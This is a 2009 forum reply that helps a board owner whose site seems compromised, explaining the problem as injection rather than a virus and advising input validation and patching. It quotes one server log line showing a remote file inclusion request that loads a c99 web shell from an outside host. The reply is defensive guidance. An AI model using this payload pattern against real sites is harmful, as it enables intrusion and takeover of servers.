Thread: Forum Infected by Virus - A trojan on My Board
View Single Post
  #5 (permalink)  
Old 05-14-2009, 09:06 PM
Tech Manager Tech Manager is offline
WebProWorld Pro
  
Join Date: Jan 2008
Posts: 294
Tech Manager RepRank 1
Default Re: Forum Infected by Virus - A trojan on My Board
This doesn't look like a virus to me, per se. It looks more like you've experienced some cross-site injection attacks; which in essence are hacks. You need to make sure all your directories have the proper permissions and you need to properly validate all the variables inputted into your site.

In your logfiles look for http:// in your queries.

Here is a log example of a slightly similar type of attack. I've added a few spaces to prevent linking.

Quote:
189.81.252.195 - - [14/May/2009:14:07:02 -0500] "GET /product.php?page=http : // wuweizhou . com /cmd/c99.txt? HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
You should also check with your IT guy to make sure your server is properly configured to prevent such attacks. Make sure your forum is up to date with security patches and, as mentioned previously, validate all user input and take steps to prevent string query exploits.
__________________
I use Country IP Blocks as added security for my networks and servers.
Reply With Quote